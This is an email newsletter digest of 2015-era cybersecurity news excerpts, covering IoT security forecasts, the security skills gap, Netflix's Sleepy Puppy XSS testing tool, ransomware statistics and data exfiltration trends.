[From the desk of Paul Davis – his opinions and no-one else’s]
Apart from the reporter’s opinions đ
So onto the news:
Why Internet of Things will change cybersecurity forever: Gartner
Over 20 percent of enterprises will have digital security services devoted to protecting business initiatives using devices and services in the Internet of Things (IoT) by year end 2017, according to Gartner, Inc.
Gartner defines digital security as the risk-driven expansion and extension of current security risk practices that protect digital assets of all forms in the digital business and ensures that relationships among those assets can be trusted.
âGovernance, management and operations of security functions will need to be significant to accommodate expanded responsibilities, similar to the ways that bring your own device (BYOD), mobile and cloud computing delivery have required changes – but on a much larger scale and in greater breadth,â said Ramamoorthy. âIT will learn much from its operational technology (OT) predecessors in handling this new environment.â
Link: http://paulgdavis.us3.list-manage1.com/track/click?u=45bf3caf699abf9904ddc00e3&id=8da5da23dc&e=20056c7556
The myth of the cybersecurity skills shortage
Everyone seems to think that thereâs a lack of qualified security professionals, and that the reason is that there arenât enough people entering the field with the required skills.
There is a fallacy behind that thinking, though.
People think that security is a stand-alone discipline, but it is actually a discipline within the computer field.
Treating it otherwise is a mistake.
security positions are not entry-level positions, and if you treat them as such, you will have terrible security.
The best security practitioners have experience in the technology and processes that they are supposed to secure.
If you are not an experienced developer, you do not have the standing to tell people how to secure the code they write.
If you have no experience as a system administrator, you cannot maintain the security of a system.
If you have no experience as an administrator, you cannot secure a database.
If you have no experience in designing a network, you cannot competently design a secure network.
Security professionals are developed over time, just as happens with experts in every profession, including all of the other disciplines within the computer profession
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=aebf72d1de&e=20056c7556
Netflix Sleepy Puppy XSS flaw detection tool goes open source
On Monday, Netflix team members Scott Behrens and Patrick Kelley revealed the open source release of the firm’s cross-site scripting (XSS) payload management framework.
Dubbed Sleepy Puppy, Netflix says the tool goes beyond only testing main applications for XSS flaws and also encompasses scans for secondary applications which may provide the conduit for XSS security flaw exploit.
In other words, Sleepy Puppy keeps an eye out for XSS payloads which may be injected within primary applications — but not trigger an alert — before shifting to a secondary area and executing.
The Netflix team call this “delayed” XSS testing.
Sleepy Puppy is designed to simplify the process of capturing, managing, and tracking XSS propagation over periods of time and testing sessions.
The configurable tool leverages an assessment model to categorize XSS strings and injections and allows users to subscribe to email notifications when delayed cross-site scripting events are triggered.
Sleepy Puppy comes with a number of payloads, as well as an API for users who wish to develop plugins to support scanners such as Burp or Zap.
Sleepy Puppy, available from the Netflix Open Source website, comes with built-in payloads, PuppyScripts and a default assessment scheme.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=6f10984e45&e=20056c7556
Extent of data breaches in pharmaceutical sector revealed
The Crown Records Management Survey revealed:
– 60% of IT decision makers in the pharmaceutical sector said their company had lost important data
– 12% had done so between seven and nine times â and 8% between 13 and 15 times
– 24% reported their company had suffered a hack
Ann Sellar, Business Development Manager at Crown Records Management, a global information management expert, said, âThese survey results should be a wake-up call for UK businesses, and especially those in the pharmaceutical sector, because the importance of protecting customer data is higher than ever.
Not only because of potential fines for data breaches (which will soon increase when the EU General Data Protection Regulation is ratified) but also because of growing public awareness.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=582b8b81e4&e=20056c7556
When a Security Policy Creates More Problems Than It Solves
Security policies can create a dangerous false sense of security and can end up being used against you in a court of law.
Looking at this from the plaintiffâs perspective in the case of a data breach, it wonât take much for lawyers, forensics analysts and expert witnesses to show that due care was indeed not taking place in the enforcement of policies and the ongoing management of security.
Thatâs already happened in some bigger cases, and itâs certainly playing out in others right now.
Now that itâs confirmed that the Federal Trade Commision (FTC) has the authority to go after companies due to lax security, this issue could get really big really fast.
Anyone can document anything they want in a policy involving things such as passwords, full-disk encryption for laptops, bring-your-own-device (BYOD) rules, etc.
But it literally means nothing when these policies are not enforced, which is often the case.
Rather than it being the oft-cited âglitchâ causing problems, the breaches we hear about are a breakdown in information security management somewhere along the way.
We know that talk is cheap in many aspects of business, but I can think of no place where itâs more evident than in information security.
Weâre seeing this very issue play out in the courts today.
Itâs time to start unchecking those boxes and do whatâs right before a third-party expert or analyst calls it out and youâre forced to act.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=684f8550b8&e=20056c7556
Ransomware jumps 127%, IoT malware on rise too: McAfee
The security firm attributes the increase to fast-growing new families such as CTB-Locker, CryptoWall, and others.
In Q2, the total number of mobile malware samples grew 17 percent.
But mobile malware infection rates declined about 1 percent per region this quarter.
The trend of decreasing botnet-generated spam volume continued through Q2, the report said, as the Kelihos botnet remained inactive.
Slenfbot again claims the top rank, followed closely by Gamut, with Cutwail rounding out the top three.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=6be8afbf65&e=20056c7556
MEPs clash over renewed calls for a European Intelligence Agency
The failed terrorist attack on the Amsterdam-Paris Thalys has prompted the outspoken group leader of the Alliance of Liberals and Democrats for Europe, Guy Verhofstadt, to reiterate his demand for a European Intelligence Agency.
However, European officials urged caution against overreaction.
Commission transport spokesman, Jakub Adamowicz, highlighted the costs and logistical problems associated with tighter security.
He suggested a “hyperactive” response may prove “counterproductive.”
Eurosceptic MEPs have also rejected demands for a European Intelligence Agency, arguing security services are the prerogative of member states.
Meanwhile Charles Michel, the Belgian Prime Minister, has gone further, urging policymakers to consider reintroducing identity and luggage inspections across international train routes.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=0d3183087e&e=20056c7556
CTF players versus professional penetration testers
According to ISACAâs State of Cybersecurity: Implications for 2015 report, 72.33% of respondents said that the biggest skill gap in todayâs security professionals is ability to understand the business.
Another interesting fact from the survey is that the majority of respondents found that less than 25% of applicants were qualified for a cybersecurity position.
These numbers highlight a very serious gap between people looking for an infosec job and modern businesses.
Actually, a similar gap exists between CTF contests and professional penetration testing.
Even at famous CTF events, usually organized in parallel with various conferences, many CTF players are students or have just started their first infosec job.
Sadly, quite often prominent teams of young but talented players fail to participate in a CTF due to the high price of travel and the events being held in venues they simply cannot afford.
A CTF player can also bring some useful insights to your team and a vision from a different angle that others will probably not have.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=f2f229e1a0&e=20056c7556
Have you ever considered a people-centric security strategy?
PCS is a strategic approach to information security that emphasises individual accountability and trust, and de-emphasises restrictive, preventive security controls.
âPCS represents a major departure from conventional security strategies, but reflects the reality that current security approaches are increasingly difficult to manage in a digital environment,â saidTom Scholtz, vice president and Gartner Fellow.
Some of you may have tried implementing a people-centric security (PCS) strategy and faced opposition from some business leaders and security and risk professionals.
But, how would they react now if they knew that by 2019, digital business adoption will compel 30 percent of organisations to implement PCS strategies â up from less than 5 percent in 2014?
The trust-based security strategy empowered decision makers within the enterpriseâs subsidiaries to make their own risk-based decisions.
In essence, it was up to the subsidiaries to make most security control decisions, with appropriate support and guidance from groupâs IT team.
This enabled a more collaborative approach that is much more aligned with the organisationâs culture to minimise risk and maximise the use of a wide variety of IT services.
This was in stark contrast to the previous policy-based dictatorial approach.
Overall, security and risk leaders must carefully consider whether PCS is appropriate for their organization and ensure that the appropriate enterprise environment exists for PCS.
PCS is not a tool for initiating cultural change.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=802175cc9b&e=20056c7556
Getting Out: Data Exfiltration Gets Sophisticated
Attackers donât have any trouble breaking into corporate networks.
According to a new McAfee Labs and Intel Security report, cybercrime has in fact become an industry unto itself, with suppliers, markets, service providers and even trading systems.
Whatâs more, companies often lag behind when it comes to applying security updates and ensuring that users follow password security protocols.
Also of interest is the increasing criminal focus on mobile and IoT-connected devices, which are prime targets for compromise not as end goals, but a way to access higher-value data assets.
Attackers have mastered the art of getting in.
Rather than fight the losing battle of open doors, enterprises are better served looking for ways to keep data at home and malicious actors trapped on the wrong side of the wall.
Link: http://paulgdavis.us3.list-manage1.com/track/click?u=45bf3caf699abf9904ddc00e3&id=6d26a16e89&e=20056c7556
============================================================
Feedback, questions? Our mailing address is: ** dailynews@paulgdavis.com (mailto:dailynews@paulgdavis.com)
If someone forwarded this email to you and you want to be added in,
please click this: ** Subscribe to this list (http://paulgdavis.us3.list-manage.com/subscribe?u=45bf3caf699abf9904ddc00e3&id=e09452545a)
** Unsubscribe from this list (http://paulgdavis.us3.list-manage1.com/unsubscribe?u=45bf3caf699abf9904ddc00e3&id=e09452545a&e=20056c7556&c=e1f0458236)
** Update subscription preferences (http://paulgdavis.us3.list-manage.com/profile?u=45bf3caf699abf9904ddc00e3&id=e09452545a&e=20056c7556)